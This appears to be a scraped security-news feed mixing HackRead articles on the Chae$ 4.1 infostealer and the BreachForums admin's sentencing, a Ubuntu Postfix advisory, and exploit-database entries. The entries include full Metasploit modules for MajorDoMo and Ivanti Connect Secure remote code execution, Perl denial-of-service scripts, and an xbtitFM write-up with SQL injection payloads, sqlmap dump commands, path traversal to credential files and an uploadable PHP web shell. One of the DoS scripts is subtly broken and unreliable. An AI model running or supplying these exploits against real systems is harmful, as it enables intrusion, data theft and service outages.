By Deeba Ahmed
The latest Chae$ 4.1 sends a direct message to the cybersecurity researchers at Morphisec within the source code.
This is a post from HackRead.com Read the original post: The Fake Fix: New Chae$ 4.1 Malware Hides in Driver Downloads

The original Chae$ malware was identified in September 2023, and its latest version, dubbed Chae$ 4.1, employs advanced code polymorphism to bypass antivirus detection.

Morphisec Threat Labs has documented its findings on Chae$ 4.1, an update to the Chae malware Infostealer series, as part of its investigation of emerging cyber threats. The report explores the new Chae$ variant, highlighting its mechanics, implications, and safeguarding measures.

Back in September 2023, Morphisec shared its analysis on a new variant of Chae$ malware, dubbed Chae$4 with Hackread.com. The malware targeted login credentials, financial data, and other sensitive information of e-commerce customers particularly in Brazil. 

Chae$4 was quickly evolving, and in its latest research blog, Morphisec provided details on the updates in Chae$ 4.1, which includes an improved Chronod module and surprisingly, a direct message to the Morphisec team within the source code. Version 4.1 is a significant improvement over previous brute force and basic obfuscation methods.

The authors of the Chae$ 4.1 malware send a message to Morphisec researchers.

The infection chain begins with an email in the Portuguese language, claiming to be an urgent request from a lawyer concerning a legal case. The victim is then redirected to a deceptive website, (totalavprotectionshop/abrirProcesso.php?email=), where they are prompted to download a ZIP file. This website also functions as a deceptive website for TotalAV, directly delivering the MSI installer without the intermediary step of a ZIP file.

Another website, (webcamcheckonline), allegedly scans the machine for risks and updates the driver after scanning. After the victim clicks the BLOCK button, JavaScript gets executed in the background, mimicking a legitimate system scan, which presents a hardcoded list of files, creating the illusion of a comprehensive computer analysis of the device.

Once the scanning is complete, the attacker sends a message stating “Security Risk Detected” and prompts the victim to download an updated driver to eliminate the risk. The unsuspecting victim clicks on the button, which triggers a script named download.js to run the malicious installer.

With the installer activated, Chae$ 4.1 also gets triggered, and from this point, the attack chain follows a similar path as Morphisec discovered in previous analyses except for some advancements in the Chae$ framework, such as modifications in the Chronod module. After successful activation, exfiltrated data is delivered to the threat actor’s C2 and the Chae$ team panel login page.

The Chronod module intercepts user activity to steal information like login credentials and banking information. It spans over 2,000 lines of code and has been adjusted to steal credentials from specific services like WhatsApp, AWS, and WordPress. In version 4.1, the Chae$ team rewrote the module to be more generic and modular, dividing the logic into several classes instead of one class responsible for all functionality.

Chae$ 4.1 also employs advanced code polymorphism to bypass antivirus detection, and detect sandbox environments, raising concerns about its potential impact on users. 

Chae$ 4.1 malware’s infection chain

To stay safe, regularly update your operating system and software, use a layered security solution with advanced malware detection, be cautious when clicking on suspicious links or opening attachments, and regularly back up critical data. Staying informed and adopting robust security practices can help protect against cyberattacks.

****_RELATED ARTICLES_****

1.  **Fake Symantec Blog Caught Spreading Proton macOS Malware**
2.  **Hackers send explicit messages to riders on hacked e-scooters**
3.  **Scammers Distribute Malware to Drivers in Speeding Ticket Scam**
4.  **iPhone Spyware Exploits Obscure Chip Feature, Targets Researchers**
5.  **Fake PoC Script Used to Trick Researchers into Downloading VenomRAT**

The Fake Fix: New Chae$ 4.1 Malware Hides in Driver Downloads

This Metasploit module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MajorDoMo Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in MajorDoMo          versions before 0662e5e.        },        'Author' => [          'Valentin Lobstein', # Vulnerability discovery and Metasploit Module          'smcintyre-r7', # Assistance        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-50917'],          ['URL', 'https://github.com/Chocapikk/CVE-2023-50917'],          ['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'],          ['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL        ],        'DisclosureDate' => '2023-12-15',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Targets' => [['Automatic', {}]],        'Privileged' => false      )    )    register_options([      Opt::RPORT(80),      OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']),    ])  end  def execute_command(cmd)    send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'),      'method' => 'GET',      'vars_get' => {        'url' => Rex::Text.encode_base64('rtsp://'),        'debug' => '1',        'transport' => "|| $(#{cmd});"      }    )  end  def exploit    execute_command(payload.encoded)  end  def check    print_status("Checking if #{peer} can be exploited!")    res = send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'),      'method' => 'GET'    )    unless res && res.code == 200      return CheckCode::Unknown('Did not receive a response from target.')    end    unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'      return CheckCode::Safe('The target is not MajorDoMo.')    end    print_good('Target is identified as MajorDoMo instance')    sleep_time = rand(5..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    print_status("Elapsed time: #{elapsed_time} seconds.")    unless res && elapsed_time >= sleep_time      return CheckCode::Safe('Failed to test command injection.')    end    CheckCode::Vulnerable('Successfully tested command injection.')  endend

MajorDoMo Command Injection

This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',        'Description' => %q{          This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are          also vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-46805'], # The auth bypass vulnerability.          ['CVE', '2024-21887'], # The command injection vulnerability.          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']        ],        'DisclosureDate' => '2024-01-10',        'Platform' => %w[linux unix],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as root.        'Targets' => [          [            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:            # cmd/linux/http/x64/meterpreter/reverse_tcp            # cmd/linux/http/x64/shell/reverse_tcp            # cmd/linux/http/x86/shell/reverse_tcp            'Linux Command',            {              'Platform' => 'linux',              'Arch' => [ARCH_CMD]            },          ],          [            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:            # cmd/unix/python/meterpreter/reverse_tcp            # cmd/unix/reverse_bash            # cmd/unix/reverse_python            'Unix Command',            {              'Platform' => 'unix',              'Arch' => [ARCH_CMD]            },          ]        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )  end  def check    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve    # the target system version information. If this requests succeeds, the target is vulnerable.    res = send_request_cgi(      'method' => 'GET',      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'    )    return CheckCode::Unknown('Connection failed') unless res    # If the vendor mitigation has been applied, the request will return 403 Forbidden.    return CheckCode::Safe if res.code != 200    # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON    # response, this is only for display purposes, we don't need to test the version information.    json_data = res.get_json_document    name = json_data.dig('software-inventory', 'software', 'name')    version = json_data.dig('software-inventory', 'software', 'version')    build = json_data.dig('software-inventory', 'software', 'build')    # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if    # get_json_document could not parse the JSON (and will return an empty Hash).    return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?    Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")  end  def exploit    send_request_cgi(      'method' => 'POST',      'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',      'ctype' => 'application/json',      'data' => {        'type' => ";#{payload.encoded} #",        'txtGCPProject' => Rex::Text.rand_text_alpha(8),        'txtGCPSecret' => Rex::Text.rand_text_alpha(8),        'txtGCPPath' => Rex::Text.rand_text_alpha(8),        'txtGCPBucket' => Rex::Text.rand_text_alpha(8)      }.to_json    )  endend

Ivanti Connect Secure Unauthenticated Remote Code Execution

Ubuntu Security Notice 6591-1 - Timo Longin discovered that Postfix incorrectly handled certain email line endings. A remote attacker could possibly use this issue to bypass an email authentication mechanism, allowing domain spoofing and potential spamming. Please note that certain configuration changes are required to address this issue. They are not enabled by default for backward compatibility.

==========================================================================  
Ubuntu Security Notice USN-6591-1  
January 22, 2024

postfix vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Postfix could allow bypass of email authentication if it received  
specially crafted network traffic.

Software Description:  
- postfix: High-performance mail transport agent

Details:

Timo Longin discovered that Postfix incorrectly handled certain email line  
endings. A remote attacker could possibly use this issue to bypass an email  
authentication mechanism, allowing domain spoofing and potential spamming.

Please note that certain configuration changes are required to address  
this issue. They are not enabled by default for backward compatibility.  
Information can be found athttps://www.postfix.org/smtp-smuggling.html.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   postfix                         3.8.1-2ubuntu0.1

Ubuntu 22.04 LTS:  
   postfix                         3.6.4-1ubuntu1.2

Ubuntu 20.04 LTS:  
   postfix                         3.4.13-0ubuntu1.3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   postfix                         3.3.0-1ubuntu0.4+esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   postfix                         3.1.0-3ubuntu0.4+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   postfix                         2.11.0-1ubuntu1.2+esm2

After a standard system update you need to enable  
smtpd_forbid_bare_newline in your configuration and reload it to make  
all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6591-1  
   CVE-2023-51764,https://bugs.launchpad.net/ubuntu/+source/postfix/+bug/2049337

Package Information:  
   https://launchpad.net/ubuntu/+source/postfix/3.8.1-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/postfix/3.6.4-1ubuntu1.2  
   https://launchpad.net/ubuntu/+source/postfix/3.4.13-0ubuntu1.3

Ubuntu Security Notice USN-6591-1

EzServer version 6.4.017 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: EzServer 6.4.017 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 22 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: EzServer 6.4.017 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x10698;

    my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n";  
    $sock->send($payload);  
    $sock->close();

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] EzServer 6.4.017 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

EzServer 6.4.017 Denial Of Service

xbtitFM versions 4.1.18 and below suffer from remote shell upload, remote SQL injection, and path traversal vulnerabilities.

    # Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities# Date: 22-01-2024# Exploit Author: Who cares anyway# Vendor Homepage: https://xbtitfm.eu# Affected versions: 4.1.18 and prior# CVE : Who cares anyway# Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.Looking at the state and the age of the codebase there are probably more, but who cares anyway...[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]Some examples:Get DB name:/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABASE() AS NCHAR),0)),1,100)))) Get DB user:/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0)),1,100)))) Get password hash of any user (might need some modification to work on different instances):/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FLOOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);Now the fun part. Automate it with sqlmap to dump the database.1) Get DB namesqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db2) Get table namessqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables3) Dump users table (usually called xbtit_users)sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump4) Crack hashes (usually unsalted MD5, yey!)hashcat –m 0 xbtitfm_exported_hashes.txt wordlist.txtPro tip: Use All-in-One-P (https://weakpass.com/all-in-one)[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)https://example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reveals_the_real_path2) Read files that contain database credentials.https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.phphttps://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.phpOr any other system file you want.https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.phpIf so, go to https://example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy.[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]If that wasn't enough already and you want RCE, visit https://example.xyz/index.php?page=file_hostingIf the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enought to bypass the filetype checks.A silly contermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"Content-Type: image/gifGIF89a;<html><body><form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?pHp    if(isset($_GET['cmd']))    {        system($_GET['cmd']);    }?></pre></body></html>The web shell will then be uploaded here:https://example.xyz/file_hosting/definately_not_a_shell.phpIf the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.

xbtitFM 4.1.18 SQL Injection / Shell Upload / Traversal

Golden FTP Server version 2.02b remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 21 january 2024# Vendor Homepage:  N/A# Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing# Notification vendor: No reported# Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";$s->send("USER anon\r\n");my $response = <$s>;print $response;$s->send("PASS anon\r\n");$response = <$s>;print $response;$s->send("SYST\r\n");$response = <$s>;print $response;sleep(2);$s->send("PASV " . "\x41"x6631 . "\r\n");sleep(3);$response = <$s>;print $response;$response = <$s>;print $response;print ">>> Sending second payload\n";$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");$response = <$s>;print $response;sleep(2);    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] Golden FTP Server 2.02b - Denied of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

Golden FTP Server 2.02b Denial Of Service

TrojanSpy Win32 Nivdort malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy Win32 NivdortVulnerability: Insecure Permissions - EoP (SYSTEM) Family: NivdortType: PE32MD5: 15bda00b57e2ed729a45f7cfa62165daVuln ID: MVID-2024-0668Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exeDisclosure: 01/20/2024Description:The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.C:\>cacls C:\pewcvmnvyr\jwgaklb.exeC:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F                          NT AUTHORITY\SYSTEM:(ID)F                          BUILTIN\Users:(ID)R                          NT AUTHORITY\Authenticated Users:(ID)CC:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemExploit/PoC:Open a cmd prompt as standard user:1) unhide the service binary   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe2) rename the service binaryC:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED3) optional replace with your own binary and escalate to SYSTEMC:\Users\norgt>dir \pewcvmnvyr\ Directory of C:\pewcvmnvyr        ..01/14/2024  02:05 AM                 0 dqrpgvnkh01/14/2024  02:05 AM                 6 egjrdhynfm01/14/2024  02:09 AM                 4 nhefhloix01/14/2024  02:05 AM           332,800 PWNED   <================= DONE01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

ProSysInfo TFTP Server TFTPDWIN version 0.4.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 20 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The TFTP server does not correctly handle the amount of data or bytes sent..  
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x520;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $tftp_server,  
    PeerPort => 69,  
    Proto    => 'udp'  
) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;

    print $ftp_socket $buffer;

    close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#     ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service

By Deeba Ahmed
Conor Brian Fitzpatrick (Pompompurin on the forum) launched BreachForums in March 2022 after the FBI took down the then-popular cybercrime marketplace, RaidForums.
This is a post from HackRead.com Read the original post: BreachForums Admin Pompompurin Gets 20-Year Supervised Sentence

Conor Brian Fitzpatrick was charged in March 2023 for stealing and selling sensitive personal data of countless US citizens and US and foreign organizations and government agencies via the forum.

Conor Brian Fitzpatrick, a 21-year-old man from Peekskill, New York, has been sentenced to 20 years of supervised release in the Eastern District of Virginia for operating the notorious BreachForums hacking forum.

For your information, Fitzpatrick launched BreachForums in March 2022 after the FBI took down the then-popular cybercrime marketplace, RaidForums. It served as an ideal platform for selling/leaking millions of personal data worldwide. The platform contained nearly 900 stolen databases storing more than 14 billion individual records, which BreachForums members were entitled to use. 

BreachForums ceased operations after the FBI apprehended Fitzpatrick and reportedly reemerged under the management of ShinyHunters, causing concern among cybersecurity experts and law enforcement agencies worldwide. Baphomet, one of the original forum administrators, confirmed the resurgence in a PGP-signed message, leaving little doubt about its authenticity.

Fitzpatrick was arrested on 15th March 2023 from his family home. Under custody, he admitted to owning/operating BreachForums under the “pompompurin” moniker. The accused was released on a $300,000 bond and was re-arrested on 2nd January 2024 for violating pretrial release conditions by using a computer without the required monitoring software and using VPN services.

Fitzpatrick was charged in March 2023 for stealing and selling sensitive personal data of countless US citizens and US and foreign organizations and government agencies via the forum. Court documents reveal that he possessed nearly 26 video files containing sexually explicit videos of minors, including prepubescent ones. Prosecutors claimed Fitzpatrick knowingly possessed these files.

The sentencing recommendation memo reveals several incidents involving Fitzpatrick, including a data leak in December 2022 exposing records of 87,760 members of InfraGuard, 200 million users of a US social media company, 20 million user records for a background check service company, and data theft involving thousands of users’ private health insurance information in March 2023.

Fitzpatrick pleaded guilty to several counts, including Conspiracy to Commit Access Device Fraud, Solicitation for the Purpose of Offering Access, and Possession of CSAM on July 13, 2023 (PDF). He served as a middleman for stolen data transactions and admitted to feeding false information to law enforcement.

Prosecutors sought 188 months (15.7 years) of imprisonment. The defendant’s attorneys filed a memo under seal recommending his sentencing, citing confidential and medical information that should not be disclosed to the public. The court showed leniency and sentenced Fitzpatrick to time served and 20 years of supervised release. The sentencing memorandum was submitted (PDF) on 16th January 2024.

Per the sentencing conditions (PDF), for the first two years of his release, Fitzpatrick will stay at home arrest with a GPS locator and also receive mental health treatment. Fitzpatrick cannot access the internet during his first year of supervised release, and a probation officer will install monitoring software on his computer.

Prosecutors claimed that Fitzpatrick’s platform enabled hackers and fraudsters to commit “more sophisticated crimes than any could have done alone,” impacting nearly every sector of U.S. society.

****_RELATED ARTICLES_****

1.  **Authorities seize the world’s biggest dark web child abuse site**
2.  **Data Breach at New BreachForums: 4,000 members’ data leaked**
3.  **Gender Diversity in Cybercrime Forums: Women Users on the Rise**
4.  **Raidforums Database Leak: Data of 460,000 Users Dumped Online**
5.  **Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**

Tag

#auth